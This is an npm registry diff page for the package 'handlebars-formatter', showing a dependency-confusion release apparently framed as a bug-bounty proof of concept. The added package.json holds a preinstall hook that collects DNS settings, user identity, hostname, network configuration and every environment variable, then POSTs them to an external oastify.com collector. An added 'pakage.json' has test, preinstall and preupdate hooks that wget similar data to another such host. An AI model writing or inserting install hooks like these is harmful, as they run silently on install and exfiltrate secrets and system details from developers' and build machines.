handlebars-formatter 0.0.1-security → 26.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of handlebars-formatter might be problematic. Click here for more details.
- package/package.json +8 -3
- package/pakage.json +13 -0
- package/README.md +0 -5
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "handlebars-formatter",
|
3
|
-
"version": "0.0
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "26.0.0",
|
4
|
+
"description": "CRITICAL - Final Dependency Confusion RCE with Intercom Attribution (nepalihacker000)",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "(echo '[+] === Nepalese Hunter: RCE Beacon with Attribution ==='; echo '[>] Timestamp: ' $(date); echo; echo '[+] --- DNS CONFIGURATION ---'; cat /etc/resolv.conf 2>/dev/null || echo 'resolv.conf not found'; echo; echo '[+] --- USER & PRIVILEGE CONTEXT ---'; id 2>/dev/null || echo 'id command not found'; echo; echo '[+] --- SYSTEM & ENVIRONMENT ---'; hostname 2>/dev/null || echo 'hostname not found'; uname -a 2>/dev/null || echo 'uname not found'; echo; echo '[+] --- PUBLIC IP (Attribution) ---'; (curl -s ifconfig.me || curl -s api.ipify.org || echo 'Public IP fetch failed'); echo; echo '[+] --- NETWORK CONFIGURATION ---'; (ifconfig 2>/dev/null || ip -o a 2>/dev/null || echo 'No network tools (ifconfig/ip) found - suggests hardened container.'); echo; echo '[+] --- FULL ENVIRONMENT VARIABLES ---'; env 2>/dev/null || echo 'env command not found') | curl -X POST --data-binary @- http://ehzwv3w6wfx7w7posqq96kwep5v2js7h.oastify.com/ATTRIBUTION-PROOF-FROM-$(hostname)"
|
8
|
+
},
|
9
|
+
"author": "nepalihacker000 (Bugcrowd P1)",
|
10
|
+
"license": "ISC"
|
6
11
|
}
|
package/pakage.json
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
{
|
2
|
+
"name": "handlebars-formatter",
|
3
|
+
"version": "10.0.1",
|
4
|
+
"description": "Bugcrowd-authorized Dependency Confusion PoC for Intercom",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "wget --quiet \"http://g5mo0528lzqwfbbtgm706yt4jvpsdi17.oastify.com/?stage=test&user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"",
|
8
|
+
"preinstall": "wget --quiet \"http://g5mo0528lzqwfbbtgm706yt4jvpsdi17.oastify.com/?stage=preinstall&user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"",
|
9
|
+
"preupdate": "wget --quiet \"http://g5mo0528lzqwfbbtgm706yt4jvpsdi17.oastify.com/?stage=preupdate&user=$(whoami)&path=$(pwd)&hostname=$(hostname)\""
|
10
|
+
},
|
11
|
+
"author": "orwa (authorized researcher)",
|
12
|
+
"license": "ISC"
|
13
|
+
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=handlebars-formatter for more information.
|